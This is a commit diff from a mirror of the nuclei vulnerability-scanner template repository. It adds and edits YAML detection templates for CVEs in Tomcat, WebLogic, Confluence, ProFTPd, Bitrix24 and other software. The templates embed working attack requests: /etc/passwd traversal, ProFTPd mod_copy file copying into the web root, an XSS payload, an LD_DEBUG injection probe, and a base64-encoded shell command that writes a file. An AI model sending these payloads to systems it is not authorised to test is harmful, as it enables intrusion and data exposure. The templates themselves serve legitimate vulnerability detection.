daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into wordpress-cves

patch-1
PD-Team 2021-03-12 17:25:27 +05:30 committed by GitHub
parent d3c9aedb78 ac1298aa01
commit c35ed8a408
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
142 changed files with 990 additions and 177 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
.github/workflows/update-readme.yml vendored
View File

@ -11,7 +11,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates'
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Install tree
run: sudo apt-get install tree -y

2
.nuclei-ignore
View File

@ -19,6 +19,6 @@ fuzzing/
# Wordlist directory contains payload to be used with templates.
helpers/
miscellaneous/
headless/
# Workflows are excluded from default run to avoid duplicate scans.
workflows/

8
.yamllint
View File

@ -1,9 +1,17 @@
---
extends: default
ignore: |
.pre-commit-config.yaml
.github/workflows/*.yml
rules:
document-start: disable
line-length: disable
new-lines: disable
new-line-at-end-of-file: disable
truthy: disable
comments:
require-starting-space: true
ignore-shebangs: true
min-spaces-from-content: 1

8
README.md
View File

@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts | Templates | Counts |
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 236 | vulnerabilities | 108 | exposed-panels | 104 |
| exposures | 61 | technologies | 50 | misconfiguration | 54 |
| workflows | 23 | miscellaneous | 16 | default-logins | 18 |
| cves | 239 | vulnerabilities | 106 | exposed-panels | 104 |
| exposures | 63 | technologies | 50 | misconfiguration | 53 |
| workflows | 23 | miscellaneous | 16 | default-logins | 19 |
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
| helpers | 2 | takeovers | 1 | - | - |
**72 directories, 705 files**.
**76 directories, 720 files**.
</td>
</tr>

1
cves/2008/CVE-2008-2650.yaml
View File

@ -9,6 +9,7 @@ requests:
- raw:
- |
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers-condition: and

28
cves/2015/CVE-2015-3306.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2015-3306
info:
name: ProFTPd RCE
author: pd-team
severity: high
reference: https://github.com/t0kx/exploit-CVE-2015-3306
description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.
tags: cve,cve2015,ftp,rce,network
network:
- inputs:
- data: "site cpfr /proc/self/cmdline\r\n"
read: 1024
- data: "site cpto /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpfr /tmp/.{{randstr}}\r\n"
read: 1024
- data: "site cpto /var/www/html/{{randstr}}\r\n"
host:
- "{{Hostname}}:21"
read-size: 1024
matchers:
- type: word
words:
- "Copy successful"
part: raw

3
cves/2015/CVE-2015-5688.yaml
View File

@ -5,7 +5,8 @@ info:
author: pikpikcu
severity: high
issues: https://github.com/geddy/geddy/issues/697
reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688
description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI.
reference: https://nodesecurity.io/advisories/geddy-directory-traversal
tags: cve,cve2015,geddy,lfi
requests:

4
cves/2016/CVE-2016-7552.yaml
View File

@ -23,5 +23,5 @@ requests:
- 200
- type: word
words:
- "Backtrace"
part: header
- "Memory map"
part: body

2
cves/2017/CVE-2017-14537.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
tags: cve,cve2017,trixbox,traversal
# Refrence:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# reference:-https://nvd.nist.gov/vuln/detail/CVE-2017-14537
# https://secur1tyadvisory.wordpress.com/2018/02/13/trixbox-multiple-path-traversal-vulnerabilities-cve-2017-14537/
# Product vendor:-https://sourceforge.net/projects/asteriskathome/

2
cves/2017/CVE-2017-16877.yaml
View File

@ -4,7 +4,7 @@ info:
name: Nextjs v2.4.1 LFI
author: pikpikcu
severity: high
refrence: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
reference: https://medium.com/@theRaz0r/arbitrary-file-reading-in-next-js-2-4-1-34104c4e75e9
tags: cve,cve2017,nextjs,lfi
requests:

26
cves/2018/CVE-2018-1207.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2018-1207
info:
name: Dell iDRAC7 and iDRAC8 Devices Code Injection/RCE
author: dwisiswant0
severity: critical
reference: https://downloads.dell.com/solutions/dell-management-solution-resources/iDRAC_CVE%201207_1211_1000116.pdf
description: |
This template supports the detection part only.
Dell EMC iDRAC7/iDRAC8, versions prior to 2.52.52.52, contain CGI injection vulnerability
which could be used to execute remote code. A remote unauthenticated attacker may
potentially be able to use CGI variables to execute remote code.
https://github.com/KraudSecurity/Exploits/blob/master/CVE-2018-1207/CVE-2018-1207.py
tags: cve,cve2018,dell,injection,rce
requests:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"
matchers:
- type: word
words:
- "calling init: /lib/"
part: all

2
cves/2018/CVE-2018-16763.yaml
View File

@ -8,7 +8,7 @@ info:
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Refrence: https://www.exploit-db.com/exploits/47138
# reference: https://www.exploit-db.com/exploits/47138
requests:
- raw:

26
cves/2018/CVE-2018-18778.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2018-18778
info:
name: mini_httpd Path Traversal
author: dhiyaneshDK
severity: high
description: ACME mini_httpd before 1.30 lets remote users read arbitrary files.
reference: https://www.acunetix.com/vulnerabilities/web/acme-mini_httpd-arbitrary-file-read/
tags: cve,cve2018,lfi
requests:
- raw:
- |+
GET /etc/passwd HTTP/1.1
Host:
Content-Length: 4
unsafe: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"

2
cves/2018/CVE-2018-19386.yaml
View File

@ -4,7 +4,7 @@ info:
name: SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author: pikpikcu
severity: medium
refrence: https://www.cvedetails.com/cve/CVE-2018-19386/
reference: https://www.cvedetails.com/cve/CVE-2018-19386/
tags: cve,cve2018,solarwinds,xss
requests:

4
cves/2019/CVE-2019-0221.yaml
View File

@ -4,7 +4,9 @@ info:
name: Apache Tomcat XSS
author: pikpikcu
severity: low
reference: https://nvd.nist.gov/vuln/detail/CVE-2019-0221
reference: |
- https://seclists.org/fulldisclosure/2019/May/50
- https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/
description: |
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and
7.0.0 to 7.0.93 echoes user provided data without escaping and is,

1
cves/2019/CVE-2019-11869.yaml
View File

@ -33,6 +33,7 @@ requests:
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Upgrade-Insecure-Requests: 1
req-condition: true
matchers-condition: and
matchers:
- type: dsl

2
cves/2019/CVE-2019-12461.yaml
View File

@ -8,7 +8,7 @@ info:
# Vendor Homepage: https://webport.se/
# Software Link: https://webport.se/nedladdningar/
# Refrence: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
# reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS
requests:
- method: GET

5
cves/2019/CVE-2019-1653.yaml
View File

@ -5,6 +5,11 @@ info:
author: dwisiswant0
severity: high
tags: cve,cve2019,cisco
description: A vulnerability in the web-based management interface of Cisco Small Business RV320 and RV325 Dual Gigabit WAN VPN Routers could allow an unauthenticated, remote attacker to retrieve sensitive information. The vulnerability is due to improper access controls for URLs. An attacker could exploit this vulnerability by connecting to an affected device via HTTP or HTTPS and requesting specific URLs. A successful exploit could allow the attacker to download the router configuration or detailed diagnostic information. Cisco has released firmware updates that address this vulnerability.
reference: |
- https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190123-rv-info
- https://www.exploit-db.com/exploits/46262/
- https://www.exploit-db.com/exploits/46655/
requests:
- method: GET

3
cves/2019/CVE-2019-2588.yaml
View File

@ -5,6 +5,9 @@ info:
author: madrobot
severity: high
tags: cve,cve2019,oracle,traversal
reference: http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
description: |
Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security)
requests:
- method: GET

2
cves/2019/CVE-2019-2725.yaml
View File

@ -19,6 +19,8 @@ requests:
- method: POST
path:
- "{{BaseURL}}/_async/AsyncResponseService"
headers:
Content-Type: application/soap; charset="utf-8"
body: >-
<?xml version="1.0" encoding="UTF-8" ?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"

3
cves/2019/CVE-2019-3396.yaml
View File

@ -3,7 +3,8 @@ info:
author: Harsh Bothra
name: Atlassian Confluence Path Traversal
severity: high
refrense: https://github.com/x-f1v3/CVE-2019-3396
description: The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
reference: https://github.com/x-f1v3/CVE-2019-3396
tags: cve,cve2019,atlassian,confluence,traversal,rce
requests:

2
cves/2019/CVE-2019-3402.yaml
View File

@ -5,7 +5,7 @@ info:
author: pdteam
severity: medium
description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
refrense: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
reference: https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
tags: cve,cve2019,atlassian,jira,xss
requests:

6
cves/2019/CVE-2019-5127.yaml
View File

@ -10,9 +10,9 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" #CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" #CVE-2019-5129
- "{{BaseURL}}/objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png" # CVE-2019-5127
- "{{BaseURL}}/objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5128
- "{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg" # CVE-2019-5129
headers:
Content-Type: application/x-www-form-urlencoded
- method: GET

2
cves/2019/CVE-2019-7256.yaml
View File

@ -4,7 +4,7 @@ info:
name: eMerge E3 1.00-06 - Remote Code Execution
author: pikpikcu
severity: critical
refrence: https://www.exploit-db.com/exploits/47619
reference: https://www.exploit-db.com/exploits/47619
tags: cve,cve2019,emerge,rce
# Vendor Homepage: http://linear-solutions.com/nsc_family/e3-series/

11
cves/2019/CVE-2019-8451.yaml
View File

@ -7,17 +7,6 @@ info:
reference: https://www.tenable.com/blog/cve-2019-8451-proof-of-concept-available-for-server-side-request-forgery-ssrf-vulnerability-in
tags: cve,cve2019,atlassian,jira,ssrf
# On September 9, Atlassian released version 8.4.0 for Jira Core and Jira Software, which included a fix for an important
# security issue reported in August 2019.
# CVE-2019-8451 is a pre-authentication server-side request forgery (SSRF) vulnerability found in
# the /plugins/servlet/gadgets/makeRequest resource. The vulnerability exists due to “a logic bug” in the JiraWhitelist class.
# An unauthenticated attacker could exploit this vulnerability by sending a specially crafted web request to a vulnerable
# Jira server. Successful exploitation would result in unauthorized access to view and potentially modify internal
# network resources.
# https://twitter.com/benmontour/status/1177250393220239360
# https://twitter.com/ojensen5115/status/1176569607357730817
requests:
- method: GET
path:

1
cves/2020/CVE-2020-0618.yaml
View File

@ -3,6 +3,7 @@ id: CVE-2020-0618
info:
name: RCE in SQL Server Reporting Services
author: joeldeleep
description: A remote code execution vulnerability exists in Microsoft SQL Server Reporting Services when it incorrectly handles page requests, aka 'Microsoft SQL Server Reporting Services Remote Code Execution Vulnerability'.
severity: high
reference: https://www.mdsec.co.uk/2020/02/cve-2020-0618-rce-in-sql-server-reporting-services-ssrs/
tags: cve,cve2020,rce

18
cves/2020/CVE-2020-10148.yaml
View File

@ -19,15 +19,14 @@ requests:
- method: GET
path:
- "{{BaseURL}}/web.config.i18n.ashx?l=nuclei&v=nuclei"
# - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
# Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
# - "{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l=nuclei&v=nuclei"
# Above path can be used if you are looking to scan for "SWNetPerfMon.db" file.
matchers-condition: and
matchers:
- type: word
words:
- "SolarWinds.Orion.Core."
# - "Connection String" # Commented matchers can be used for "SWNetPerfMon.db" file.
part: body
- type: word
@ -37,13 +36,4 @@ requests:
- type: status
status:
- 200
# - type: word
# words:
# - "Connection String"
# - "text/plain"
# part: all
# condtion: and
#
# Commented matchers can be used for "SWNetPerfMon.db" file.
- 200

7
cves/2020/CVE-2020-11034.yaml
View File

@ -4,11 +4,12 @@ info:
name: GLPI v.9.4.6 - Open redirect
author: pikpikcu
severity: low
reference: |
- https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
- https://github.com/glpi-project/glpi/archive/9.4.6.zip
- https://nvd.nist.gov/vuln/detail/CVE-2020-11034
tags: cve,cve2020,redirect
# https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg
# https://github.com/glpi-project/glpi/archive/9.4.6.zip
# https://nvd.nist.gov/vuln/detail/CVE-2020-11034
requests:
- method: GET

8
cves/2020/CVE-2020-1147.yaml
View File

@ -3,12 +3,12 @@ id: CVE-2020-1147
info:
name: RCE at SharePoint Server (.NET Framework & Visual Studio) detection
author: dwisiswant0
description: A remote code execution vulnerability exists in .NET Framework, Microsoft SharePoint, and Visual Studio when the software fails to check the source markup of XML file input, aka '.NET Framework, SharePoint Server, and Visual Studio Remote Code Execution Vulnerability'.
severity: critical
tags: cve,cve2020,sharepoint,iis,rce
# Ref:
# - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
# - https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
reference: |
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1147
- https://srcincite.io/blog/2020/07/20/sharepoint-and-pwn-remote-code-execution-against-sharepoint-server-abusing-dataset.html
requests:
- method: GET

7
cves/2020/CVE-2020-13167.yaml
View File

@ -6,6 +6,9 @@ info:
severity: critical
description: Netsweeper through 6.4.3 allows unauthenticated remote code execution because webadmin/tools/unixlogin.php (with certain Referer headers) launches a command line with client-supplied parameters, and allows injection of shell metacharacters.
tags: cve,cve2020,netsweeper,rce
reference: |
- https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
- https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
# This template exploits a Python code injection in the Netsweeper
# WebAdmin component's unixlogin.php script, for versions 6.4.4 and
@ -18,10 +21,6 @@ info:
# Though the advisory lists 6.4.3 and prior as vulnerable, 6.4.4 has
# been confirmed exploitable.
# References:
# - https://ssd-disclosure.com/ssd-advisory-netsweeper-preauth-rce/
# - https://portswigger.net/daily-swig/severe-rce-vulnerability-in-content-filtering-system-has-been-patched-netsweeper-says
requests:
- method: GET
path:

31
cves/2020/CVE-2020-13483.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2020-13483
info:
name: Bitrix24 through 20.0.0 allows XSS
author: pikpikcu
severity: high
reference: https://gist.github.com/mariuszpoplwski/ca6258cf00c723184ebd2228ba81f558
description: The Web Application Firewall in Bitrix24 through 20.0.0 allows XSS via the items[ITEMS][ID] parameter to the components/bitrix/mobileapp.list/ajax.php/ URI.
tags: cve,cve2020,xss,bitrix
requests:
- method: GET
path:
- '{{BaseURL}}/bitrix/components/bitrix/mobileapp.list/ajax.php/?=&AJAX_CALL=Y&items%5BITEMS%5D%5BBOTTOM%5D%5BLEFT%5D=&items%5BITEMS%5D%5BTOGGLABLE%5D=test123&=&items%5BITEMS%5D%5BID%5D=%3Cimg+src=%22//%0d%0a)%3B//%22%22%3E%3Cdiv%3Ex%0d%0a%7D)%3Bvar+BX+=+window.BX%3Bwindow.BX+=+function(node,+bCache)%7B%7D%3BBX.ready+=+function(handler)%7B%7D%3Bfunction+__MobileAppList(test)%7Balert(document.domain)%3B%7D%3B//%3C/div%3E'
matchers-condition: and
matchers:
- type: word
words:
- "{alert(document.domain);}"
part: body
- type: word
words:
- text/html
part: header
- type: status
status:
- 200

35
cves/2020/CVE-2020-13700.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2020-13700
info:
name: acf-to-rest-api wordpress plugin IDOR
author: pikpikcu
severity: high
reference: https://gist.github.com/mariuszpoplwski/4fbaab7f271bea99c733e3f2a4bafbb5
description: |
An issue was discovered in the acf-to-rest-api plugin through 3.1.0 for WordPress.
It allows an insecure direct object reference via permalinks manipulation, as demonstrated by a
wp-json/acf/v3/options/ request that reads sensitive information in the wp_options table, such as the login and pass values.
tags: cve,cve2020,wordpress
requests:
- method: GET
path:
- '{{BaseURL}}/wp-json/acf/v3/options/a?id=active&field=plugins'
matchers-condition: and
matchers:
- type: word
words:
- 'Content-Type: application/json'
part: header
- type: word
words:
- 'acf-to-rest-api\/class-acf-to-rest-api.php'
part: body
condition: and
- type: status
status:
- 200

7
cves/2020/CVE-2020-13937.yaml
View File

@ -11,12 +11,11 @@ info:
3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed
Kylin's configuration information without any authentication,
so it is dangerous because some confidential information entries will be disclosed to everyone.
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937
reference: |
- https://kylin.apache.org/docs/release_notes.html
- https://s.tencent.com/research/bsafe/1156.html
tags: cve,cve2020,apache
# References:
# https://s.tencent.com/research/bsafe/1156.html
requests:
- method: GET
path:

2
cves/2020/CVE-2020-13942.yaml
View File

@ -11,7 +11,7 @@ info:
that could execute code with the permission level of the running Java process.
This vulnerability affects all versions of Apache Unomi prior to 1.5.2. Apache Unomi users should upgrade to 1.5.2 or later.
References:
reference: |
- https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/
- https://twitter.com/chybeta/status/1328912309440311297
tags: cve,cve2020,apache,rce

2
cves/2020/CVE-2020-14179.yaml
View File

@ -5,7 +5,7 @@ info:
author: x1m_martijn
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow remote, unauthenticated attackers to view custom field names and custom SLA names via an Information Disclosure vulnerability in the /secure/QueryComponent!Default.jspa endpoint. The affected versions are before version 8.5.8, and from version 8.6.0 before 8.11.1.
reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14179
reference: https://jira.atlassian.com/browse/JRASERVER-71536
tags: cve,cve2020,atlassian,jira
requests:

3
cves/2020/CVE-2020-14413.yaml
View File

@ -4,7 +4,8 @@ info:
name: NeDi 1.9C XSS
author: pikpikcu
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-14413
reference: https://gist.github.com/farid007/8db2ab5367ba00e87f9479b32d46fea8
description: NeDi 1.9C is vulnerable to XSS because of an incorrect implementation of sanitize() in inc/libmisc.php. This function attempts to escape the SCRIPT tag from user-controllable values, but can be easily bypassed, as demonstrated by an onerror attribute of an IMG element as a Devices-Config.php?sta= value.
tags: cve,cve2020,nedi,xss
requests:

8
cves/2020/CVE-2020-14864.yaml
View File

@ -6,11 +6,15 @@ info:
cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
severity: high
tags: cve,cve2020,oracle,traversal
reference: |
- http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html
- https://www.oracle.com/security-alerts/cpuoct2020.html
requests:
- method: GET
headers:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
# Why is the header needed here? it doesn't appear to be required by the exploit
# headers:
# User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
path:
- '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies
- '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd'

11
cves/2020/CVE-2020-14882.yaml
View File

@ -4,7 +4,11 @@ info:
name: Oracle WebLogic Server Unauthenticated RCE (and Patch Bypass)
author: dwisiswant0
severity: critical
reference: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
reference: |
- https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf
- https://twitter.com/jas502n/status/1321416053050667009
- https://youtu.be/JFVDOIL0YtA
- https://github.com/jas502n/CVE-2020-14882#eg
description: |
Vulnerability in the Oracle WebLogic Server
product of Oracle Fusion Middleware (component: Console).
@ -15,11 +19,6 @@ info:
Successful attacks of this vulnerability can result in takeover.
tags: cve,cve2020,oracle,rce,weblogic
# References:
# - https://twitter.com/jas502n/status/1321416053050667009
# - https://youtu.be/JFVDOIL0YtA
# - https://github.com/jas502n/CVE-2020-14882#eg
requests:
- payloads:
exec:

9
cves/2020/CVE-2020-15505.yaml
View File

@ -4,14 +4,19 @@ info:
name: RCE in MobileIron Core & Connector <= v10.6 & Sentry <= v9.8
author: dwisiswant0
severity: critical
reference: https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
description: |
A remote code execution vulnerability in MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0; and Sentry versions 9.7.2 and earlier, and 9.8.0; and Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier that allows remote attackers to execute arbitrary code via unspecified vectors.
reference: |
- https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
- https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505
- https://github.com/iamnoooob/CVE-Reverse/blob/master/CVE-2020-15505/hessian.py#L10
- https://github.com/orangetw/JNDI-Injection-Bypass
tags: cve,cve2020,mobileiron,rce
# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see references[2] below.
# This template works by passing a Hessian header, otherwise;
# it will return a 403 or 500 internal server error. References[3].
# References:
# - [1] https://blog.orange.tw/2020/09/how-i-hacked-facebook-again-mobileiron-mdm-rce.html
# - [2] https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505

3
cves/2020/CVE-2020-16846.yaml
View File

@ -9,8 +9,7 @@ info:
with the SSH client enabled, can result in shell injection.
This template supports the detection part only. See references.
References:
reference: |
- https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag
- https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846
tags: cve,cve2020,saltstack

13
cves/2020/CVE-2020-16952.yaml
View File

@ -4,16 +4,13 @@ info:
name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE
author: dwisiswant0
severity: critical
reference: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951.
reference: |
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
- https://srcincite.io/pocs/cve-2020-16952.py.txt
- https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
tags: cve,cve2020,sharepoint,iis
# This template supports the detection part only. See references[2].
# References:
# - [1] Patch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952
# - [2] https://srcincite.io/pocs/cve-2020-16952.py.txt
# - [3] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952
# - [4] https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md
requests:
- method: GET
path:

2
cves/2020/CVE-2020-17496.yaml
View File

@ -4,6 +4,8 @@ info:
author: pussycat0x
severity: critical
reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
description: |
vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.
tags: cve,cve2020,vbulletin,rce
requests:

10
cves/2020/CVE-2020-17505.yaml
View File

@ -6,15 +6,7 @@ info:
severity: high
description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform.
tags: cve,cve2020,rce
# Artica Web Proxy 4.30.00000000
# allows an authenticated remote attacker
# to inject commands via the service-cmds parameter in cyrus.php.
# These commands are executed with root
# privileges via service_cmds_peform.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
reference: https://blog.max0x4141.com/post/artica_proxy/
requests:
- raw:

9
cves/2020/CVE-2020-17506.yaml
View File

@ -6,14 +6,7 @@ info:
severity: critical
description: Artica Web Proxy 4.30.00000000 allows remote attacker to bypass privilege detection and gain web backend administrator privileges through SQL injection of the apikey parameter in fw.login.php.
tags: cve,cve2020
# Artica Web Proxy 4.30.00000000
# allows remote attacker to bypass privilege detection
# and gain web backend administrator privileges
# through SQL injection of the apikey parameter in fw.login.php.
# -
# References:
# > https://blog.max0x4141.com/post/artica_proxy/
references: https://blog.max0x4141.com/post/artica_proxy/
requests:
- method: GET

3
cves/2020/CVE-2020-17518.yaml
View File

@ -5,6 +5,9 @@ info:
author: pd-team
severity: critical
reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518
description: |
Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system,
through a maliciously modified HTTP HEADER.
tags: cve,cve2020,apache,traversal
requests:

16
cves/2020/CVE-2020-17530.yaml
View File

@ -4,16 +4,14 @@ info:
name: Apache Struts RCE
author: pikpikcu
severity: critical
reference: http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
reference: |
- http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
- http://jvn.jp/en/jp/JVN43969166/index.html
- https://cwiki.apache.org/confluence/display/WW/S2-061
- https://security.netapp.com/advisory/ntap-20210115-0005/
tags: cve,cve2020,apache,rce,struts
# Forced OGNL evaluation, when evaluated on raw user input in tag attributes,
# may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
# References:
# http://jvn.jp/en/jp/JVN43969166/index.html
# http://packetstormsecurity.com/files/160721/Apache-Struts-2-Forced-Multi-OGNL-Evaluation.html
# https://cwiki.apache.org/confluence/display/WW/S2-061
# https://security.netapp.com/advisory/ntap-20210115-0005/
description: |
Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution. Affected software : Apache Struts 2.0.0 - Struts 2.5.25.
requests:
- method: GET

1
cves/2020/CVE-2020-1943.yaml
View File

@ -3,6 +3,7 @@ id: CVE-2020-1943
info:
name: Apache OFBiz Reflected XSS
author: pd-team
description: Data sent with contentId to /control/stream is not sanitized, allowing XSS attacks in Apache OFBiz 16.11.01 to 16.11.07.
severity: medium
tags: cve,cve2020,apache,xss

2
cves/2020/CVE-2020-2036.yaml
View File

@ -3,6 +3,8 @@ info:
name: Palo Alto Networks Reflected XSS
author: madrobot
severity: medium
description: >
A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
tags: cve,cve2020,vpn,xss

5
cves/2020/CVE-2020-2096.yaml
View File

@ -4,6 +4,11 @@ info:
name: Jenkins Gitlab Hook XSS
author: madrobot
severity: medium
description: Jenkins Gitlab Hook Plugin 1.4.2 and earlier does not escape project names in the build_now endpoint, resulting in a reflected XSS vulnerability.
